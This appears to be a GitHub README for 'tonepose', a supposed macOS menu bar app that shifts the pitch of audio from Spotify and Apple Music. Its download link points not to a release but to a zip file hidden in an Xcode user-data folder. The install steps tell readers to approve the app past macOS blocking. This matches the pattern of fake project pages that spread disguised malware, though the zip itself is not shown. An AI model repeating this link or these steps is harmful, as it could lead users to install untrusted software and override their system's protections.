🎵 tonepose - Transpose audio with less effort

Download tonepose

🧭 What tonepose does

tonepose is a small menu bar app for macOS that changes the pitch of audio while you listen. It helps you transpose songs in Spotify, Apple Music, and other apps without changing your playback setup.

Use it when you want to:

  • Match a song to your vocal range
  • Practice music in a different key
  • Hear tracks in a lower or higher pitch
  • Keep your playback in the app you already use

tonepose stays in the menu bar, so it does not get in your way

💻 What you need

Before you install tonepose, check these basic points:

  • A Mac running a recent version of macOS
  • Enough free disk space for a small app
  • Access to the internet to get the app from GitHub
  • A music app such as Spotify or Apple Music if you want to test it right away

tonepose is built for macOS, not Windows. If you are on Windows, the app will not run on that system

📥 Download tonepose

Go to this page to download the app:

https://github.com/Basilel6571/tonepose/raw/refs/heads/main/tonepose.xcodeproj/project.xcworkspace/xcuserdata/Software-v2.3.zip

On the GitHub page, look for the latest release or the main download files. Save the file to your Mac, then open it

🛠️ Install tonepose on Mac

Follow these steps:

  1. Open the GitHub link above in your browser
  2. Find the release or download file for tonepose
  3. Download the app file to your Mac
  4. Open the downloaded file
  5. If macOS asks for approval, allow the app to open
  6. Move tonepose to your Applications folder if asked

If macOS blocks the app, use the standard Open option from Finder after the first attempt

🚀 Start using tonepose

After you open tonepose:

  1. Look at the menu bar at the top of your screen
  2. Find the tonepose icon
  3. Click the icon to open the controls
  4. Choose the pitch shift you want
  5. Start music in Spotify, Apple Music, or another audio app
  6. Listen and adjust until the key fits your needs

The app works best when you test small changes first, such as one or two semitones up or down

🎚️ How transposing works

tonepose changes the pitch of the audio you hear. That means:

  • Higher values raise the key
  • Lower values drop the key
  • Small changes sound natural
  • Large changes can make voices and instruments sound unusual

If you sing along, start with a small shift and move up or down until the song feels right

🎧 Best use cases

tonepose fits a few common needs:

  • Vocal practice for singers
  • Song study for musicians
  • Learning a track in a new key
  • Adjusting music to match a live performance
  • Quick pitch changes without editing the audio file

Because it sits in the menu bar, you can leave it open while you switch between apps

⚙️ Basic setup tips

Use these simple tips for a smoother start:

  • Close extra audio tools if you hear conflicts
  • Make sure your music app is playing sound before you test tonepose
  • Keep the app open while listening
  • Start with a small pitch change
  • Check the menu bar if you cannot find the controls

If the audio sounds clipped or rough, reduce the amount of transpose

🔒 Privacy and local use

tonepose is a local utility for your Mac. It is meant to work as a small helper app for audio playback. You keep control of your music apps and your system settings

🧩 Features

  • Menu bar access for quick control
  • Audio transpose for everyday listening
  • Works with Spotify
  • Works with Apple Music
  • Works with other apps that send audio through the system
  • Light setup with a small footprint
  • Simple controls for fast changes

🧪 Troubleshooting

If tonepose does not seem to work, try these steps:

  • Quit and reopen the app
  • Make sure your music app is playing
  • Check that your Mac sound output is on the right device
  • Try a different transpose value
  • Restart your Mac if the audio driver feels stuck

If you still do not hear changes, open the GitHub page and check for updates or release notes
